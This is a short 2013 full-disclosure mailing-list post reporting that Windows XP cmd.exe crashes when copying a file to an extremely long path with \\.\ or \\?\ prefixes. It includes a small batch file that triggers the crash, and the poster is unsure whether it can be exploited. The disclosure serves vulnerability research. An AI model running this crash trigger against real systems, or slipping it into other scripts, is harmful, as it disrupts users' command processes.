List:       full-disclosure
Subject:    [Full-disclosure] Windows XP cmd.exe crash
From:       Pedro Laguna <pedlagdur () hotmail ! co ! uk>
Date:       2013-06-28 13:17:43

[Attachment #2 (multipart/alternative)]

Ey list! Just something quick and funny crash I found long time ago and it =
may give some of you something to check this weekend.
Windows XP cmd.exe crash when trying to copy files with a very long name. T=
he following BATCH file can crash the cmd.exe process:
----------------------------------- crash.bat -----------------------------=
---------@echo offecho test > data.txtcopy "%CD%"\data.txt \\.\C:\AAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAA.txtREM copy "%CD%"\data.txt \\?\C:\AAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
.txt---------------------------------- / crash.bat ------------------------=
It only happens with "copy" but not with "move" command and with both \\.\ =
and \\?\ prefixes. I'm not an expert on these fields so I don't know if it =
will be possible to exploit it=2C maybe some of you with crazy kung fu skil=
ls can do it. If not=2C it's just a weird behaviour for the cmd.exe and giv=
en that is less than a year to the end of life of the Windows XP cannot see=
 any harm sharing it.
Ta!
--
Pedro Laguna 		 	   		  =